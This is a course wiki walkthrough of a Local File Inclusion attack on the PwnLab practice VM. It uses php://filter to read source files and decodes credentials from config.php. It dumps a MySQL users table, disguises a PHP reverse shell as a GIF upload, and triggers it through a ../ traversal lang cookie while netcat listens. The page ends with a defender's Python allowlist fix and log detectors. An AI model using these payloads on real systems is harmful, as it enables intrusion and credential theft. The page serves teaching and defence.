Web Apps: LFI - Paiet/SEC-335 GitHub Wiki

  • LFI (Local File Inclusion) (example VM: PwnLab)

    • Type of attack where the attacker abuses a web app that builds an include/file path from user input, letting them read local files on the target machine and, combined with a file upload, execute commands

    • Scanning/Enumeration

      • Run Nmap
      • Open PwnLab website in browser
      • Run Nikto
        • /config.php: PHP config file may contain database IDs and passwords
          • This looks promising
          • browse to /config.php
            • Blank page
            • View source
              • Blank! Where's the source?
              • Use php://filter to get source

http://192.168.219.145/?page=php://filter/convert.base64-encode/resource=index

  • We find a base64-encoded string
    • Decode it (base64 is an encoding, not encryption)
      • echo ...jwvaHRtbD4= | base64 --decode
      • python -m base64 -d <<< ...jwvaHRtbD4=
      • Use Hackbar
      • Online decoder
  • Has interesting code (a good LFI attack vector!):

    ```php
    <?php
    //Multilingual. Not implemented yet.
    //setcookie("lang","en.lang.php");
    // The cookie value is concatenated straight into the include path: no allowlist,
    // no traversal check, so whoever controls the "lang" cookie picks the file that gets included.
    if (isset($_COOKIE['lang']))
    {
         include("lang/".$_COOKIE['lang']);
    }
    ```

    • We'll need this later

http://192.168.219.145/?page=php://filter/convert.base64-encode/resource=config

  • Decode base64 string

  • EUREKA!!! We have a username and password

  • Try logging in to the site

    • Denied
  • Try logging into the MySQL service

    • mysql -u root -p -h 192.168.219.145
    • Success!
      • show databases;
        • information_schema
        • Users
          • use Users;
          • show tables;
            • users
          • select * from users;
            • Found 3 users with base64-encoded passwords
            • Decode passwords
            • Save to file
    • Log in to the PwnLab website
      • I'm now able to upload a file
        • This is good news for LFI attack
      • Upload php-reverse-shell.php
        • Looks like file upload is restricted to image files
        • We need to modify the php-reverse-shell to imitate a .gif
          • Add "GIF98" as the very first line in our php-reverse-shell
          • Change file extension to ".gif"
          • Upload modified php-reverse-shell.gif
          • Copy image location
      • Start netcat listener
        • nc -nlvp 9999
      • Use LFI cookie include to trigger reverse shell
        • Start TamperData
        • Click PwnLab "Home" button
        • Click "Tamper" when TamperData prompts you
        • Edit "Cookie" section
          • Delete cookie data
          • Add line: lang=../../../../../../../var/www/html/upload/<image-location>.gif
          • Press "OK"
        • Check netcat listener
        • Welcome to SHELL! :)
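As an added defender's example (not from this wiki or the PwnLab VM): the allowlist check that the `include("lang/".$_COOKIE['lang'])` line above is missing, plus a detector for the two request patterns this page relies on (the php://filter source read and the ../ cookie include) run over constructed access-log lines. The `fr.lang.php` entry and a log format that records the Cookie header are assumptions.

```python
import re
from urllib.parse import unquote

# Assumption: the only language files that lang/ legitimately contains.
# The wiki shows "en.lang.php"; "fr.lang.php" is a constructed extra entry.
ALLOWED_LANGS = {"en.lang.php", "fr.lang.php"}
DEFAULT_LANG = "en.lang.php"

# Inputs an include() built from user data must never see:
STREAM_WRAPPER = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)  # php://, data://, ...
TRAVERSAL = re.compile(r"\.\.[\\/]")                                  # ../ or ..\ segments


def safe_lang(cookie_value: str) -> str:
    """Hardened replacement for include("lang/".$_COOKIE['lang']): URL-decode,
    reject null bytes / stream wrappers / traversal, then require an exact
    allowlist match; anything else falls back to the default language file."""
    value = unquote(cookie_value or "")
    if "\x00" in value or STREAM_WRAPPER.search(value) or TRAVERSAL.search(value):
        return DEFAULT_LANG
    return value if value in ALLOWED_LANGS else DEFAULT_LANG


def lfi_indicators(log_line: str) -> list[str]:
    """Flag the two request patterns this page relies on in one access-log line."""
    decoded = unquote(log_line)  # also catches %2e%2e%2f style encoding
    hits = []
    if re.search(r"php://filter", decoded, re.IGNORECASE):
        hits.append("php-filter-wrapper")      # source disclosure via ?page=
    if TRAVERSAL.search(decoded):
        hits.append("path-traversal")          # ../../ in a query string or cookie
    return hits


def scan_log(lines: list[str]) -> dict[int, list[str]]:
    """Map line index -> indicators for every line that has at least one."""
    return {i: h for i, line in enumerate(lines) if (h := lfi_indicators(line))}


# Constructed access-log lines. Assumption: the LogFormat appends the Cookie
# header (e.g. %{Cookie}i) as the last quoted field; the default "combined"
# format would not record the lang cookie at all.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?page=login HTTP/1.1" 200 512 "lang=en.lang.php"',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /?page=php://filter/convert.base64-encode/resource=config HTTP/1.1" 200 1200 "-"',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET / HTTP/1.1" 200 300 "lang=../../../../../../../var/www/html/upload/x.gif"',
]

if __name__ == "__main__":
    for idx, hits in scan_log(SAMPLE_LOG).items():
        print(f"line {idx}: {', '.join(hits)}")
```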